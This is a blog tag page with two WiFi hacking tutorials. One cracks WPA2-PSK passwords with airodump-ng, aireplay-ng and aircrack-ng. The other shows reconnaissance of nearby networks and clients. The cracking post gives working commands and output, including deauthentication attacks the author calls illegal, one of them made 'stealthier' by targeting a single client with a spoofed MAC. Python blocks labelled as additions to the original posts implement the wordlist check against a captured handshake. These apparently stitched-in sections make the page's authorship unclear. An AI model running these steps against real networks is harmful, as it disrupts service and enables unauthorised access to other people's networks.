Tag: aircrack-ng

  • How to crack your WiFi network’s password with aircrack-ng

    How to crack your WiFi network’s password with aircrack-ng

    Hello again! If you read my last post on AP and Client discovery with Airodump-ng, then get ready to take the skills you learned to the next level! We’re not just going to be observers anymore. We’re going to hack wireless networks by cracking their passwords!

    This method involves using airodump-ng to capture the traffic that the infamous wireless cracking tool, aircrack-ng, needs in order to crack passwords with a wordlist. And the best part is, this can be done completely offline!

    Let’s get started!

    Wireless Encryption

    Before we get started with hacking WiFi, there are a few things we have to understand first.

    Wireless Access Points (APs) support a variety of different encryption standards. Those in existence are WEP, WPA, WPA2, and WPA3.

    WEP is the weakest and can be cracked quickly without a wordlist. WPA, WPA2, and WPA3 are successive improvements on one another. We’re not going to go into the details but just know that each one that follows offers stronger encryption and other security improvements.

    The encryption standard we are going to be focusing on is WPA2. It has been around since 2004 and its successor has yet to make a full public appearance (at the time of this writing). If you did some snooping after reading my post about airodump-ng, you might have noticed that the most popular encryption type was WPA2. That’s because it’s the strongest encryption method that offers the most support for wireless devices. Your home network is probably encrypted with WPA2 and many businesses use WPA2 encryption.

    We’re also going to be focusing on WPA2/PSK, not the Enterprise variety. PSK stands for Pre-shared Key and if you’ve ever logged into a WiFi network with a plain-text password, you’ve used PSK encryption. Enterprise requires an additional server, called a RADIUS server, and users are authenticated with an account. For this reason, it is used for businesses because it offers centralized control.

    WPA2/PSK is the most common encryption method for a wireless network at the time of this writing. So, you’ll likely have plenty of options to experiment with.

    The 4-way Handshake

    The 4-way handshake occurs every time a client associates itself with a wireless access point (a user logs in to the WiFi). Basically, the purpose of this 4-way handshake is to generate the encryption keys needed for an authorized client to communicate with the AP.

    We’re not going to go super in-depth on the protocol behind this but this diagram from a Medium article sums the process up nicely:

    I recommend checking that article out for a pretty decent explanation. This youtube video is also pretty good at explaining the 4-way handshake.

    All you need to know is that once we capture this 4-way handshake, aircrack-ng takes each guess from the wordlist and, together with the parameters it needs from the handshake, reconstructs the encryption keys (PTK and/or GTK). It then uses those keys to compute the MIC (Message Integrity Check) for the captured handshake frame. If that MIC matches the original MIC in the captured handshake, the guess is correct.

    If you didn’t get all that don’t worry! Seeing this in action might help to clear things up. Even if it doesn’t, it took me a while to understand this process in-depth.

    Capturing the Handshake

    Ok! Onto the fun stuff! The first step in this process is to get that 4-way handshake. To do that we need a couple of things:

    1. a running instance of airodump-ng
    2. a client to associate with the network (a WiFi network you can log in to)

    First, let’s get our network card into monitor mode:

    $ sudo airmon-ng start wlx9cefd5fee020

    Now, our network card is ready to start capturing information. Fire up airodump-ng:

    $ sudo airodump-ng wlan0mon
    
    D8:38:FC:FC:EB:A9  -41        2        0    0   1  130   WPA2 CCMP   PSK  Hack Me

    You can stop here and wait for airodump-ng to capture a handshake from any network within range, or target a specific one. aircrack-ng can recognize multiple handshakes and you can choose from the list you gathered, but I’m going to target a specific network I already have access to:

    $ sudo airodump-ng --bssid D8:38:FC:FC:EB:A9 -c 1 wlan0mon -w ~/Desktop/mywifi
    
     CH  1 ][ Elapsed: 12 s ][ 2023-06-27 16:09 ][ WPA handshake: D8:38:FC:FC:EB:A9 
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
     D8:38:FC:FC:EB:A9  -43   0      105       17    8   1  130   WPA2 CCMP   PSK  Hack Me                                                        
    
     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
    
     D8:38:FC:FC:EB:A9  18:26:49:74:0B:E4   -6   36e- 6e    21       62  EAPOL

    This process should be pretty familiar to you by now. One difference is that we captured a WPA handshake. airodump-ng handily tells us this in the top right.

    Remember, to capture the handshake we need a client to associate with the AP. In my case, since I already knew the password, I just re-authenticated with my phone.

    If you don’t know the password, you have a couple of options:

    1. Wait until a client re-associates
    2. Force a client to re-associate

    The second option is illegal but I’ll show you how to do it for educational purposes only. Note: your traffic will be logged by the AP and there is a chance you could get caught for this, so do it at your own risk.

    To force re-authentication on clients, we can kick them off the network with aireplay-ng:

    $ sudo aireplay-ng -0 100 -a D8:38:FC:FC:EB:A9 wlan0mon

    This command will send 100 deauthentication frames (-0 100) to everyone on my network (-a <BSSID>). In other words, I would be DoS-ing my own network if I were to run this.

    To make this a little stealthier, we can target a single client with -c <client MAC> and spoof our MAC address with -h <spoofed MAC>:

    $ sudo aireplay-ng -0 3 -a D8:38:FC:FC:EB:A9 -c 27:18:C2:1B:0B:A4 -h 44:28:78:90:C1:68 wlan0mon

    Whichever route you go, you should now have captured a handshake and written the captured data to a file. I saved mine to ~/Desktop/mywifi. Let’s open Wireshark to see what the handshake looks like:

    The protocol used for the handshake is EAPOL, so I filtered my results to display only the handshake. As expected, there are four of them.

    Cracking the password

    The moment we’ve all been waiting for…Now we get to crack the password!

    At this point, we’ve gathered everything we need to start our attack. If you haven’t done so already, you can go ahead and take your network card out of monitor mode and shut down airodump-ng:

    $ sudo airmon-ng stop wlan0mon

    To crack my network’s password, I’m going to use the infamous rockyou.txt wordlist. This wordlist is commonly used in CTFs and other hacking challenges involving password cracking because of its popularity. It even comes preinstalled in some hacking Linux distributions like Kali Linux. So, if your password shows up in rockyou, I suggest you change it…

    To crack the password, all you need to give aircrack-ng is the wordlist and the capture file like so:

    $ aircrack-ng -w /opt/rockyou.txt mywifi-01.cap
    
    Reading packets, please wait...
    Opening mywifi-01.cap
    Read 10891 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  D8:38:FC:FC:EB:A9  Hack Me             WPA (1 handshake)
    
    Choosing first network as target.
    
    Reading packets, please wait...
    Opening mywifi-01.cap
    Read 10891 packets.
    
    1 potential targets
    
    
    
                                   Aircrack-ng 1.6 
    
          [00:00:02] 18440/10303727 keys tested (10231.10 k/s) 
    
          Time left: 16 minutes, 45 seconds                          0.18%
    
                               KEY FOUND! [ appletree ]
    
    
          Master Key     : 1F 9A CD 80 9E 4A 5D 41 F8 49 28 52 94 D9 5D 5A 
                           C7 6F 5A FC 41 98 74 51 91 F6 E5 E9 FC 22 CC E4 
    
          Transient Key  : 2B 3A 52 BC 76 6A 6A 00 00 00 00 00 00 00 00 00 
                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    
          EAPOL HMAC     : 24 41 72 F8 5E 04 E4 6F 37 72 24 CC 57 F9 0B E3

    As you can see, it automatically identified the handshake and since there was only one in the file, it got straight to cracking. In no time at all, it was able to find the password: appletree. For me, it took less than a few seconds. Embarrassing…

    We can also see that it was able to calculate the other parameters of the 4-way handshake including the PMK (Master Key), the PTK, and the MIC (EAPOL HMAC).
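    To make the handshake explanation and the Master Key / Transient Key / EAPOL HMAC lines above concrete, here is an added Python example (not code from the original post and not part of the aircrack-ng project) that walks through exactly the per-guess check described earlier: passphrase and SSID go through PBKDF2-SHA1 to give the PMK (aircrack’s “Master Key”), the PMK plus both MAC addresses and both nonces give the PTK (“Transient Key”), and the first 16 bytes of the PTK are used to HMAC the captured EAPOL frame, which must reproduce the MIC (“EAPOL HMAC”). The handshake used here is constructed, not captured: the nonces are made up, the BSSID and station MAC are the ones printed in the post, and the EAPOL frame is a minimal message 2 whose MIC is computed with the known passphrase so that the check has something to verify against.

```python
import hashlib
import hmac

# Constants of the WPA2-PSK key hierarchy (IEEE 802.11i).
PBKDF2_ITERATIONS = 4096   # PSK -> PMK cost; this is what bounds the guess rate
PMK_LEN = 32
KCK_LEN = 16               # first 16 bytes of the PTK: the Key Confirmation Key used for the MIC
MIC_OFFSET = 81            # Key MIC field in an EAPOL-Key frame (counted from the 802.1X header)
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1 with the SSID as salt (aircrack's 'Master Key')."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_LEN)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PMK -> PTK (aircrack's 'Transient Key'): both MACs and both nonces, smaller value first."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP Key MIC: HMAC-SHA1 over the frame with its MIC field zeroed, cut to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def candidate_matches(candidate: str, hs: dict) -> bool:
    """One aircrack-ng guess: derive PMK and PTK for the candidate, recompute and compare the MIC."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    return hmac.compare_digest(eapol_mic(ptk[:KCK_LEN], hs["eapol"]), captured_mic)


def first_match(wordlist, hs: dict):
    """Return the first candidate whose MIC matches, or None when the wordlist is exhausted."""
    for word in wordlist:
        if candidate_matches(word, hs):
            return word
    return None


def make_sample_handshake(passphrase: str) -> dict:
    """Constructed stand-in for message 2 of a captured 4-way handshake (not a real capture).
    The client computes this MIC with the real PSK, so the sample is built the same way."""
    ssid = "Hack Me"
    ap_mac = bytes.fromhex("D838FCFCEBA9")    # BSSID shown in the post (author says it was changed)
    sta_mac = bytes.fromhex("182649740BE4")   # station shown in the post
    anonce = bytes(range(32))                 # constructed nonces
    snonce = bytes(range(32, 64))
    # EAPOL-Key layout: 802.1X header, descriptor type, key info, key length, replay counter,
    # nonce, key IV, RSC, key ID, MIC (zeroed for now), key data length.
    eapol = (b"\x02\x03\x00\x5f" + b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 7 + b"\x01"
             + snonce + b"\x00" * 32 + b"\x00" * MIC_LEN + b"\x00\x00")
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)[:KCK_LEN]
    eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + MIC_LEN:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol}


if __name__ == "__main__":
    hs = make_sample_handshake("appletree")
    print("KEY FOUND:", first_match(["password", "12345678", "appletree"], hs))
```

    The point worth taking away is where the time goes: the 4096-round PBKDF2 step runs once per guess, which is why the post’s run tests roughly 10,000 keys per second and needs about 17 minutes for the ten million entries of rockyou. A passphrase that is not in any wordlist simply never reaches the matching branch, which is the whole defence.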

    And that’s it! Easy peezee-lemon-squeezy! Of course, your results will depend on the wordlist you use. If your password is not in the wordlist, you won’t be able to crack the password. For proof of concept, you might want to make a small test wordlist with your WiFi password included (assuming you’re attacking a network you have access to).

    Conclusion

    You now know how to crack WiFi passwords running WPA2/PSK encryption! Give yourself a pat on the back hacker!

    Of course, it goes without saying that if you crack the password of a network and then use that password to get unauthorized access to the network, that is where you cross the line into illegal territory. So please, don’t do that. 🙂

    By all means, try this out 100% passively. See what information you can gather with airodump-ng just by leaving it running in your home for an hour or so. You might be surprised at what you’ve gathered. Then try cracking passwords for fun!

    It’s surprising how many people will opt for insecure passwords. I mean, my own apartment complex’s network opted for one of the weakest passwords in the book… Come on! It’s 2023! No matter how secure a system is, people will always be the weakest link. I changed the BSSID and the ESSID of the network in the examples to avoid legal trouble but their WiFi might as well be public…

    Anyways…Hope you enjoyed this article. I certainly enjoyed writing it! Stay tuned for more and practice responsibly!

  • How to visualize the networks around you

    How to visualize the networks around you

    Hello! In this post we’re going to shift gear onto a new topic: Wireless Hacking! When I was younger, I loved learning about networks. I was fascinated by all of the wireless traffic floating around through the air. This led me down the rabbit hole of wireless hacking, and among the very first wireless testing tools I learned how to use was aircrack-ng.

    aircrack-ng is part of a suite of tools used for various WiFi hacking methods, ranging anywhere from cracking passwords from WiFi handshakes to creating fake wireless access points. They are relatively easy to use, yet require you to have a stronger understanding of wireless networks than many automated scripts do. The aircrack-ng line of tools was also developed in the classic UNIX style: each does one simple thing really well, allowing for modular and flexible attacks.

    For this reason, learning how to use aircrack-ng‘s tools is a great place to start if you want to get into wireless attacks. So, without further ado, let’s kick off this journey by teaching you how to monitor the wireless devices in your area!

    Before getting started…

    I’m going to assume you have a few things before getting started:

    1. A machine running Linux (can be a VM).
    2. At least some experience on the command line.
    3. A wireless card supporting monitor mode.

    If you have all those things, great! If not, then no sweat. Follow along for an interesting read and maybe get yourself all set up in the future :).

    Your onboard network card may not support monitor mode (mine doesn’t) so check out this article from Null Byte on good recommendations. I have been using Panda Wireless’s PAU05 since I first started and I highly recommend getting one (or something similar) because it’s cheap and has a low profile.

    Everything I’m about to teach you in this article is 100% legal. We are simply acting as observers watching traffic fly by in the air, which is public space. So, I encourage you to follow along for the best learning!

    Monitor mode

    By default, most network cards operate in managed mode. This just means that they will associate themselves with a single wireless access point. Currently, my wireless adapter is running in managed mode:

    $ iwconfig
    
    wlx9cefd5fee020  IEEE 802.11  ESSID:off/any  
              Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
              Retry short  long limit:2   RTS thr:off   Fragment thr:off
              Power Management:off

    Monitor mode, on the other hand, allows the wireless network card to capture traffic from other wireless access points and clients connected to those access points (or clients attempting to connect).

    We can switch our wireless card into monitor mode with airmon-ng:

    $ sudo airmon-ng start wlx9cefd5fee020                               
    
    Found 4 processes that could cause trouble.
    Kill them using 'airmon-ng check kill' before putting
    the card in monitor mode, they will interfere by changing channels
    and sometimes putting the interface back in managed mode
    
        PID Name
        644 avahi-daemon
        650 NetworkManager
        688 wpa_supplicant
        702 avahi-daemon
    
    PHY	Interface	Driver		Chipset
    
    phy0	wlp0s20f3	iwlwifi		Intel Corporation Ice Lake-LP PCH CNVi WiFi (rev 30)
    phy1	wlx9cefd5fee020	rt2800usb	Ralink Technology, Corp. RT5372
    Interface wlx9cefd5fee020mon is too long for linux so it will be renamed to the old style (wlan#) name.
    
    		(mac80211 monitor mode vif enabled on [phy1]wlan0mon
    		(mac80211 station mode vif disabled for [phy1]wlx9cefd5fee020)

    You might’ve noticed that I supplied airmon-ng with the name of my wireless adapter, wlx9cefd5fee020, and it went ahead and renamed it to wlan0mon for our convenience.

    Also, it identified some processes that may force our wireless card back into managed mode. You can kill those processes by running sudo airmon-ng check kill. I usually don’t because I’ve never had any trouble with this. If you’re only using an onboard wireless card, then you may want to before continuing.

    Running iwconfig again, we can see that the switch was successful:

    $ iwconfig
    
    wlan0mon  IEEE 802.11  Mode:Monitor  Tx-Power=20 dBm   
              Retry short  long limit:2   RTS thr:off   Fragment thr:off
              Power Management:off

    Monitoring the air

    Now it’s time for the fun stuff: sniffing traffic with airodump-ng!

    To start it, all you have to do is give it your wireless card’s name:

    $ sudo airodump-ng -M -W wlan0mon
    
    CH  8 ][ Elapsed: 12 s ][ 2023-06-19 12:08 
    
     BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH WPS      ESSID                      MANUFACTURER
    
     1A:F8:00:30:03:04   -1        0        0    0   2   -1                    0.0      <length:  0>               Unknown                               
     D8:38:FF:2C:10:28  -35        7        0    0  11  130   WPA2 CCMP   PSK  0.0      Star Legacy                Ruckus Wireless                                            
     1C:9E:D0:DD:CA:B8  -52        7        0    0   6  130   WPA2 CCMP   PSK  2.0      Deli Customer              eero inc.                               
     1E:9D:F6:D7:CA:BE  -53        7        0    0   6  130   OPN              0.0      MyCoolWiFi                 TP-Link Corporation Limited              

    All you need to start airodump-ng is to run airodump-ng <card name> but I like to add -M to display manufacturer info and -W to see what version of WPS the access point (AP) is running.

    airodump-ng neatly separates data into columns, including:

    • BSSID: The device’s MAC address
    • PWR: The wireless signal strength (the larger the number the closer the AP)
    • CH: The frequency channel the AP is operating on
    • ENC: The encryption method being used (if any)
    • and more!

    Additionally, airodump-ng lists clients associated with an AP. We can zero in on a single AP to view the devices connected to it:

    $ sudo airodump-ng --bssid 11:F5:20:FF:C4:83 -c 6 wlan0mon                                                                                  
    
     CH  6 ][ Elapsed: 6 s ][ 2023-06-19 13:01 
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
     11:F5:20:FF:C4:83   -1   0        0        0    0  -1   -1                    Batman                                                          
    
     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
    
     11:F5:20:FF:C4:83  EA:C8:FE:DC:63:46  -60    0 -12      0       83                                                                                   
     11:F5:20:FF:C4:83  CA:98:CB:4C:93:1A  -62    0 -12     15       54                                                                                   
     11:F5:20:FF:C4:83  92:D0:69:4F:F6:D3  -78    0 -12      0        1

    Now, we can see all of the client MAC addresses that are connected to “Batman” under the STATION column.

    Monitoring a single network in this way can allow you to leverage a surprising amount of information. For example, you can see what devices are connected to a network, giving you a rough idea of its structure and purpose. You can even get an idea of how many people are in a building given the number of mobile devices connected.

    There are more ways we can filter down all of this information. I highly recommend checking out airodump-ng‘s manual page with man airodump-ng to see what else you can do.

    Visualizing Results

    If you are capturing a ton of traffic, it can be extremely helpful to save the output to a file for examining and processing later. For example, I collected information about the networks near me on all bands (both 2.4 and 5 GHz) and saved the output to a file with this command:

    $ sudo airodump-ng -b abg -w /tmp/capture/blog-test wlan0mon

    The -b argument tells airodump-ng what bands to hop across (in this case, all) and -w tells it the file name/location to write to.

    airodump-ng writes the data to a number of different file formats, including a csv (which can be useful for opening as a spreadsheet or using in a script), and files that can be passed to other tools (like kismet, wireshark, or aircrack-ng).
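    The csv mentioned above is the easiest of those formats to process in a script. The following is an added Python example, not code from the original post or from the aircrack-ng project: it parses the two sections of an airodump-ng csv (access points first, then stations), joins each station to its AP, flags open and WEP networks, and lists which unassociated stations are probing for which ESSIDs. The csv text is constructed here to mimic the format and the networks seen earlier in the post (it is not a real capture), and the column layout follows airodump-ng’s csv output as I know it, so treat the exact header names as an assumption and check them against a file of your own.

```python
from typing import Dict, List, Tuple

AP_COLS, AP_ESSID_IDX = 15, 13      # AP section: ESSID is column 14 of 15, Key is last
STA_COLS, STA_PROBE_IDX = 7, 6      # station section: probed ESSIDs is the last of 7
WEAK_PRIVACY = {"OPN", "WEP"}       # no encryption, or encryption crackable without a wordlist

# Constructed sample modelled on the airodump-ng csv format (not a real capture).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
D8:38:FF:2C:10:28, 2023-06-19 12:08:01, 2023-06-19 12:08:12, 11, 130, WPA2, CCMP, PSK, -35, 7, 0, 0. 0. 0. 0, 11, Star Legacy, 
1E:9D:F6:D7:CA:BE, 2023-06-19 12:08:01, 2023-06-19 12:08:12,  6, 130, OPN, , , -53, 7, 0, 0. 0. 0. 0, 10, MyCoolWiFi, 
00:11:22:33:44:55, 2023-06-19 12:08:02, 2023-06-19 12:08:10,  1,  54, WEP, WEP, , -70, 3, 12, 0. 0. 0. 0, 9, Old, Cafe, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
EA:C8:FE:DC:63:46, 2023-06-19 12:08:03, 2023-06-19 12:08:12, -60, 83, D8:38:FF:2C:10:28, 
CA:98:CB:4C:93:1A, 2023-06-19 12:08:04, 2023-06-19 12:08:12, -62, 54, D8:38:FF:2C:10:28, Star Legacy
92:D0:69:4F:F6:D3, 2023-06-19 12:08:05, 2023-06-19 12:08:11, -78,  1, (not associated), Deli Customer,MyCoolWiFi
"""


def _fields(line: str, ncols: int, join_idx: int) -> List[str]:
    """Split one csv line into ncols fields. An ESSID or probe list that itself contains
    commas produces extra pieces; those are re-joined into column join_idx."""
    raw = line.split(",")
    if len(raw) > ncols:
        extra = len(raw) - ncols
        raw = raw[:join_idx] + [",".join(raw[join_idx:join_idx + extra + 1])] + raw[join_idx + extra + 1:]
    raw += [""] * (ncols - len(raw))          # pad short lines so indexing never fails
    return [f.strip() for f in raw]


def parse_airodump_csv(text: str) -> Tuple[List[dict], List[dict]]:
    """Return (access_points, stations) from airodump-ng csv text."""
    aps, stations, section = [], [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("BSSID,"):          # header of the AP section
            section = "ap"
            continue
        if line.startswith("Station MAC,"):    # header of the station section
            section = "sta"
            continue
        if section == "ap":
            f = _fields(line, AP_COLS, AP_ESSID_IDX)
            aps.append({"bssid": f[0], "channel": f[3], "privacy": f[5], "cipher": f[6],
                        "auth": f[7], "power": int(f[8]), "essid": f[13]})
        elif section == "sta":
            f = _fields(line, STA_COLS, STA_PROBE_IDX)
            probes = [p.strip() for p in f[6].split(",") if p.strip()]
            stations.append({"mac": f[0], "power": int(f[3]), "bssid": f[5], "probes": probes})
    return aps, stations


def summarize(text: str) -> Tuple[List[dict], Dict[str, List[str]]]:
    """Per-AP report (encryption, client count, weak flag) plus the probe list per station."""
    aps, stations = parse_airodump_csv(text)
    clients: Dict[str, List[str]] = {}
    for s in stations:
        if s["bssid"] != "(not associated)":   # airodump's marker for unassociated stations
            clients.setdefault(s["bssid"], []).append(s["mac"])
    report = [{"essid": ap["essid"], "bssid": ap["bssid"], "privacy": ap["privacy"] or "?",
               "clients": len(clients.get(ap["bssid"], [])),
               "weak": ap["privacy"] in WEAK_PRIVACY} for ap in aps]
    probing = {s["mac"]: s["probes"] for s in stations if s["probes"]}
    return report, probing


if __name__ == "__main__":
    report, probing = summarize(SAMPLE_CSV)
    for row in report:
        flag = "  <-- weak" if row["weak"] else ""
        print(f'{row["bssid"]}  {row["privacy"]:5}  clients={row["clients"]}  {row["essid"]}{flag}')
    for mac, essids in probing.items():
        print(f"{mac} probing for: {', '.join(essids)}")
```

    Run it against your own file with `summarize(open("blog-test-01.csv").read())`. The weak flag is the defensive takeaway from a scan like this: an OPN or WEP network on the list is one you would want to find before anyone else does, and the probe list shows which of your own devices are still advertising networks they once joined.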

    It can also be helpful to make this large amount of information more visual. This can be easily done with airgraph-ng. Note, airgraph-ng didn’t come installed with the rest of the aircrack-ng tools when I installed it, so you might have to install it separately.

    To run airgraph-ng you feed it the csv file written by airodump-ng and specify a graph type:

    $ airgraph-ng -i blog-test-01.csv -g CAPR -o blog-test-capr.png

    We supply a graph-type of CAPR with -g. CAPR stands for Client to AP Relationship and is useful for quickly seeing what AP’s are nearby and what devices are connected to them. Here’s a snippet of the one I took of the networks in my area:

    This is much easier to wrap our head around (at least for me) than scanning rows in a spreadsheet. The colored ovals represent the security encryption of the AP.

    The other graph type, CPG, stands for Common Probe Graph. It shows us the devices that are sending probe requests (trying to connect) to certain AP’s. To generate your own, change the -g option from the last command to CPG and you should get something like this:

    It’s a lot less colorful than the CAPR, but can be useful for nefarious acts, such as creating a fake AP for these clients to connect to.

    Exiting Monitor Mode

    After we’ve finished monitoring networks, it’s time to revert our network card to managed mode so it can connect to WiFi again. airmon-ng makes this a snap:

    $ sudo airmon-ng stop wlan0mon

    If you had airmon-ng kill any services, you may want to restart them like so:

    $ sudo systemctl start NetworkManager

    In case you don’t remember which services you killed, fret not! A simple reboot of your machine will get the services back up and running.

    Conclusion

    Now you know how to observe the access points around you! This is a powerful skill that can be used to develop attacks — knowledge is power!

    I encourage you to be curious and try this at your home or anywhere you might find yourself. It’s good practice to familiarize yourself with how different wireless networks behave. Just make sure you hide your screen in public. Don’t want to scare anyone with your flashy hacker terminal!

    In the coming future, we’ll go more in-depth into monitoring wireless networks so stay tuned! In the meantime…have fun!